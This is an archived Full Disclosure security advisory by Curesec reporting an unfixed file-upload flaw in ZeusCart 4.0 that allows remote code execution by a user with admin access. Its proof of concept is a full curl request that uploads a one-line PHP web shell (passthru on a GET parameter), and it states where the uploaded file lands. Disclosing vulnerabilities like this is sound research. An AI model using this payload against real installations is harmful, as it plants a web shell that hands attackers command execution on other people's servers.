lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <55F6F3F1.1090409@curesec.com> Date: Mon, 14 Sep 2015 18:21:05 +0200 From: "Curesec Research Team (CRT)" <crt@...esec.com> To: fulldisclosure@...lists.org Subject: [FD] ZeusCart 4.0: Code Execution - not fixed ZeusCart 4.0: Code Execution Security Advisory – Curesec Research Team 1. Introduction Affected Product: ZeusCart 4.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: support@...scart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 09/14/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description It is possible to upload PHP files when uploading an image for a new product. This leads to code execution once an attacker has gained access to the backend via SQL Injection, CSRF, or XSS. Please note that an admin account with the right to add products is needed. 3. Proof of Concept curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=--------1849257448' \ -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \ --data-binary $'----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a18\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a22\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0atest\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"desc\"\x0d\x0a\x0d\x0adesc\x0d \x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"price\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"msrp_org\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"soh\"\x0d\x0a\x0d\x0a7\x0d\x0a----------1849257448--\x0d\x0a' \ 'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert' The image will be located here: http://localhost/zeuscart-master/images/products/YYYY-MM-DDHHMMSStest.php 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 08/13/2015 Informed Vendor about Issue (no reply) 09/07/2015 Reminded Vendor of release date (no reply) 09/14/2015 Disclosed to public 6. Blog Reference: http://blog.curesec.com/article/blog/ZeusCart-40-Code-Execution-57.html _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists